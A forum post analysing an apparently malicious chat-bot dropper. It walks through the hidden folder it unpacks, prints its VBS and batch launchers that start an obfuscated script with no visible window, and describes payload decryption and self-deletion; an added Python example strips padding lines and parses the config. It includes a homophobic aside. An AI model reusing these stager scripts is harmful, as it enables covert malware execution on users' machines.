Okay, Ainille sent me a copy of that apparently evil chat bot.
Well... let's get an idea of what this does and why it is actually bad. Shall we?
When run, it will unpack an embedded archive into a hidden folder at %userprofile%\jgayw\.
<-- gay!!
This folder then contains the following files:
56554.cmd
77645.vbs
KmHrdAQQB.VQK
mVpqAeG.exe
UFxo.KTP
VQShAqBQEs.QPS
It then shows a black DOS window and does seemingly nothing.
However, it secretly executes the 77645.vbs. That file contains:
const Hidden = 0                 ' window style 0: run with no visible window
const WaitOnReturn = true        ' block until the launched process exits
File = """C:\Users\YourUsernameHere\jgayw\56554.cmd"""
set WshShell = CreateObject("WScript.Shell")
WshShell.Run File, Hidden, WaitOnReturn   ' launch the .cmd with its window hidden
wscript.quit
Note how it will already contain the full user path.
This basically executes the 56554.cmd file, which contains this:
@echo off
rem move into the dropped folder
cd %userprofile%\jgayw\
rem hand the .VQK script to the bundled interpreter
start mVpqAeG.exe "KmHrdAQQB.VQK"
This executes the KmHrdAQQB.VQK file using mVpqAeG.exe. I've found that it uses this framework / scripting language.
That .vqk is actually a plaintext script file filled with 2 million lines of spam. Bad attempt at obfuscation, because if you remove them all with a simple regex find/replace you get this:
51,000 characters. Can't put in a post.
Read the script here.
This script does some bad things. Well, it would, I guess, if you ran it outside of a sandbox. If you care what, then read it.
The VQShAqBQEs.QPS (referenced by the script) contains this:
[3797560]
9869251=2973211
[3508157]
9366118=9034676
[4523506]
4523506=jgayw
This appears to be some sort of simple config file.
However, the actually bad thing is the second thing this script can do.
It decrypts the UFxo.KTP, resulting in THIS THING, and executes it.
Oh, and it is also able to tracelessly delete itself if told to.
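Added here as an example, not part of the original post and not code from the sample itself: the two mechanical steps of the analysis above, stripping the padding lines out of the dumped .VQK script and reading the [section] key=value config, in Python. The post does not show what the two million junk lines look like, so the "zzz N zzz" filler below is a constructed assumption; the second stripper does not need to know the pattern at all and instead drops any line whose shape (digits collapsed) repeats many times, on the assumption that generated filler repeats and real code lines mostly do not.

```python
"""
Added example (not from the original post): strip padding lines from a
script dumped alongside the malware described above, then read its
INI-style config. The real .vqk padding format is not shown on the page,
so the junk lines below are a constructed assumption.
"""
import configparser
import re
from collections import Counter

# Constructed sample "script": three real lines buried in repetitive junk.
# The junk shape ("zzz <number> zzz") is an assumption for demonstration.
SAMPLE_SCRIPT = "\n".join([
    "zzz 1 zzz",
    "set a = 1",
    "zzz 2 zzz",
    "zzz 3 zzz",
    'call decrypt("UFxo.KTP")',
    "zzz 4 zzz",
    "run result",
    "zzz 5 zzz",
])

# Constructed copy of the config layout quoted in the post (same shape and values).
SAMPLE_CONFIG = "\n".join([
    "[3797560]",
    "9869251=2973211",
    "[3508157]",
    "9366118=9034676",
    "[4523506]",
    "4523506=jgayw",
])


def strip_by_regex(text: str, junk_pattern: str) -> str:
    """Drop every line that fully matches junk_pattern: the post's
    'simple regex find/replace', for when the padding pattern is known."""
    junk = re.compile(junk_pattern)
    kept = [ln for ln in text.splitlines() if not junk.fullmatch(ln)]
    return "\n".join(kept)


def line_shape(line: str) -> str:
    """Collapse digit runs so lines that differ only by a number share a shape."""
    return re.sub(r"\d+", "0", line.strip())


def strip_by_shape(text: str, min_repeats: int = 3) -> str:
    """Drop lines whose shape recurs at least min_repeats times.
    Useful when the padding pattern is not known in advance: template-generated
    filler repeats, while real code lines are mostly unique."""
    lines = text.splitlines()
    counts = Counter(line_shape(ln) for ln in lines)
    kept = [ln for ln in lines if counts[line_shape(ln)] < min_repeats]
    return "\n".join(kept)


def parse_config(text: str) -> dict[str, dict[str, str]]:
    """Read the [section] key=value layout as plain INI (no interpolation,
    so '%' in values cannot trigger configparser substitution)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return {section: dict(cp[section]) for section in cp.sections()}


if __name__ == "__main__":
    print(strip_by_regex(SAMPLE_SCRIPT, r"zzz \d+ zzz"))
    print(strip_by_shape(SAMPLE_SCRIPT))
    print(parse_config(SAMPLE_CONFIG))
```

Caveat on the shape-based stripper: a real script line that legitimately repeats (an "end if" or a closing brace) can be swept away along with the filler, so raise min_repeats, or diff its output against the regex version, before trusting it on a sample you have not eyeballed.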
>>disable LSD's key